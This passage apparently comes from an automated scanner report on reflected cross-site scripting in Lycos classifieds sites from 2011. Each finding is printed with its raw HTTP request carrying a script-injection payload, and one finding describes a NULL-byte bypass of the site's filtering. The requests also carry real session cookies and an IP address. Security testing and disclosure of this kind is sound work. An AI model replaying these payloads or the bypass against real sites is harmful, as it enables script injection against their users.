Set-Cookie: classifieds[lastpage][0][name]=Sedans; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203?38e66"><script>alert(1)</script>328e80c3280=1&mobile=1" rel="nofollow">
...[SNIP]...

1.232. http://classifieds.lycos.com/vehicle-car-suv/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-suv/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23f0c"><script>alert(1)</script>689aeb97041 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-suv23f0c"><script>alert(1)</script>689aeb97041/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-suv23f0c"><script>alert(1)</script>689aeb97041/?mobile=1" rel="nofollow">
...[SNIP]...

1.233. http://classifieds.lycos.com/vehicle-car-suv/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-suv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2abea"><script>alert(1)</script>c96611a4213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-suv/?2abea"><script>alert(1)</script>c96611a4213=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 105613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-suv/?2abea"><script>alert(1)</script>c96611a4213=1&mobile=1" rel="nofollow">
...[SNIP]...

1.234. http://classifieds.lycos.com/vehicle-car-truck/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-truck/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8355"><script>alert(1)</script>4bd8ec7dbaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-truckd8355"><script>alert(1)</script>4bd8ec7dbaa/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-truckd8355"><script>alert(1)</script>4bd8ec7dbaa/?mobile=1" rel="nofollow">
...[SNIP]...

1.235. http://classifieds.lycos.com/vehicle-car-truck/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-truck/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51867"><script>alert(1)</script>116d2a68c1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-truck/?51867"><script>alert(1)</script>116d2a68c1f=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 101338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-truck/?51867"><script>alert(1)</script>116d2a68c1f=1&mobile=1" rel="nofollow">
...[SNIP]...

1.236. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car/2008-ford-40k-miles-2416144596

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87310"><script>alert(1)</script>9e0ee8e16ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car87310"><script>alert(1)</script>9e0ee8e16ae/2008-ford-40k-miles-2416144596 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car87310"><script>alert(1)</script>9e0ee8e16ae/2008-ford-40k-miles-2416144596?mobile=1" rel="nofollow">
...[SNIP]...

1.237. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car/2008-ford-40k-miles-2416144596

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007ffaf"><script>alert(1)</script>1459be4bf30 was submitted in the REST URL parameter 2. This input was echoed as 7ffaf"><script>alert(1)</script>1459be4bf30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car/2008-ford-40k-miles-2416144596%007ffaf"><script>alert(1)</script>1459be4bf30 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car/2008-ford-40k-miles-2416144596%007ffaf"><script>alert(1)</script>1459be4bf30?mobile=1" rel="nofollow">
...[SNIP]...

1.238. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car/2008-ford-40k-miles-2416144596

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1da9"><script>alert(1)</script>abf23606d77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car/2008-ford-40k-miles-2416144596?c1da9"><script>alert(1)</script>abf23606d77=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:25 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar; path=/
Set-Cookie: classifieds[lastpage][0][name]=Cars; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car/2008-ford-40k-miles-2416144596?c1da9"><script>alert(1)</script>abf23606d77=1&mobile=1" rel="nofollow">
...[SNIP]...

1.239. http://classifieds.lycos.com/vehicle-motorcycle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f957e"><script>alert(1)</script>e606bae3932 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-motorcyclef957e"><script>alert(1)</script>e606bae3932/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:18 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-motorcyclef957e"><script>alert(1)</script>e606bae3932/?mobile=1" rel="nofollow">
...[SNIP]...

1.240. http://classifieds.lycos.com/vehicle-motorcycle/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-motorcycle/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f418a"><script>alert(1)</script>8b2f5758549 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-motorcycle/?f418a"><script>alert(1)</script>8b2f5758549=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-motorcycle/?f418a"><script>alert(1)</script>8b2f5758549=1&mobile=1" rel="nofollow">
...[SNIP]...

1.241. http://classifieds.lycos.com/vehicle-parts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-parts/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22cbd"><script>alert(1)</script>e56189542c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-parts22cbd"><script>alert(1)</script>e56189542c1/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-parts22cbd"><script>alert(1)</script>e56189542c1/?mobile=1" rel="nofollow">
...[SNIP]...

1.242. http://classifieds.lycos.com/vehicle-parts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-parts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b38"><script>alert(1)</script>e3c05e93053 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-parts/?91b38"><script>alert(1)</script>e3c05e93053=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 83433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-parts/?91b38"><script>alert(1)</script>e3c05e93053=1&mobile=1" rel="nofollow">
...[SNIP]...

1.243. http://classifieds.lycos.com/vehicle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67f6"><script>alert(1)</script>5959bf12699 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehiclec67f6"><script>alert(1)</script>5959bf12699/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehiclec67f6"><script>alert(1)</script>5959bf12699/?mobile=1" rel="nofollow">
...[SNIP]...

1.244. http://classifieds.lycos.com/vehicle/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abf83"><script>alert(1)</script>3bd7c3d9a6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle/?abf83"><script>alert(1)</script>3bd7c3d9a6c=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 96135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle/?abf83"><script>alert(1)</script>3bd7c3d9a6c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.245. http://classifieds.lycos.com.au/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com.au
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eeb5"><script>alert(1)</script>33f3545c70b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6eeb5"><script>alert(1)</script>33f3545c70b=1 HTTP/1.1
Host: classifieds.lycos.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?6eeb5"><script>alert(1)</script>33f3545c70b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.246. http://classifieds.lycos.in/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.in
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e577e"><script>alert(1)</script>5bdc50df2f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e577e"><script>alert(1)</script>5bdc50df2f3=1 HTTP/1.1
Host: classifieds.lycos.in
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
